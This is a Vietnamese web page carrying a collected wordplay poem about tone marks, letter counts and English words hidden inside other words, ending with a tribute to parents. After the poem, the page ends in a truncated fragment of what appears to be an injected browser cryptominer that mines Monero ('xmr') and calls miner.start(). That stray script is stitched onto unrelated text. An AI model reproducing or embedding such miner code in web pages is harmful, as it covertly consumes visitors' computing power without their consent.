HAY TRONG TỪ NGỮ ...- Băng Nga sưu tầm -

HAY TRONG TỪ NGỮ ...
Trong từ "Nhẹ" vẫn có dấu "Nặng"
Trong từ "Vững" vẫn có dấu "Ngã"
Trong từ "Hiểu" vẫn có dấu "Hỏi"
Từ "Ngắn" vẫn dài hơn từ "Dài".
Trước khi học được "KHÔN",
ta phải đánh vần qua vần "KHỜ" .
"Sung sướng" có 9 chữ thì "Gian truân" cũng thế
"Hạnh phúc" có 8 chữ thì "Bi thương" cũng thế
"Tình yêu" có 7 chữ thì "Phản bội" cũng thế
"Sự thật" có 6 chữ thì "Giả dối" cũng thế
"Bạn bè" có 5 chữ thì "Kẻ thù" cũng thế
"Cười" có 4 chữ thì "Khóc" cũng thế
"Yêu" có 3 chữ thì "Hận" cũng thế
"Ta" có 2 chữ thì "Nó" cũng thế
"Ứ" có 1 chữ thì "Ừ" cũng thế
Trong "Friend" (bạn bè) vẫn có "End" (chấm hết)
Trong "Believe" (tin tưởng) vẫn có "Lie" (lừa dối)
Trong "Lover" (người thương) vẫn có "over" (kết thúc)
Chỉ có từ DAD viết ngược vẫn là DAD
Và chữ MOM viết ngược vẫn là MOM.
Nghĩa là bố mẹ là duy nhất ❤️
-st-

 
 

 
 
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();